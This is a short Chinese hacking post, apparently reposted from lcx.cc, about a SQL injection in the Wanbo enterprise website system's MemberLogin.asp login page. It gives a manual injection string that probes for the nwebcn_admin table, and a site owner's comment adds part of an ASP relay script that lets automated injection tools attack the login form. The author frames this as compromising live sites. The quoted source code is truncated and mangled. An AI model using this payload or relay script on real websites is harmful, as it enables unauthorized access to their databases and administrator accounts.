作者:流浪的风
这两天拿站的时候,好几回都遇到个叫万博的企业管理系统,今天有时间就下载过来看了看,找到了个注入漏洞,郁闷的是,得手工,没法用工具,累人的事。因为已经找到了一个,我就没兴趣接着往下看了。
这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了。
MemberLogin.asp 源码如下:
MemberLogin.asp: if request.QueryString("Action")="Out" then Public ErrMsg(3) dim LoginName,LoginPassword,VerifyCode,MemName,Password,GroupID,GroupName,Working,rs,sql if LoginPasswordPassword then if not Working then if UCase(LoginName)=UCase(MemName) and LoginPassword=Password then |
看到了,LoginName 未作过滤,直接代入查询,因此产生了这个注入,就是利用的方法有点麻烦,我试了下,没办法用工具,郁闷了。
手工如:wzasdf' and exists (select * from [nwebcn_admin]) and '1'='1
真是郁闷的手工,这个JB烂的洞。。。
站长评论:
胡说,神马没法拿工具跑,无语……
注入中转脚本,form.asp:
Dim WinHttp, Sql, Url 'Sql = "LoginName=" & UrlEncoding("test' " & Request("Sql") & " and '1'='1", True) WinHttp.Open "POST", Url, False Response.Write Url & " " & Sql '----------------------------------------------------------------' Public Function UrlEncoding(v, f) 'URL编码 |
临时写的脚本,没做检查,不出意外的话,地址:http://127.0.0.1/form.asp?sql=test,直接拿穿山甲跑,就行了。。。
留言评论(旧系统):
文章来源于lcx.cc:万博企业网站管理系统注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论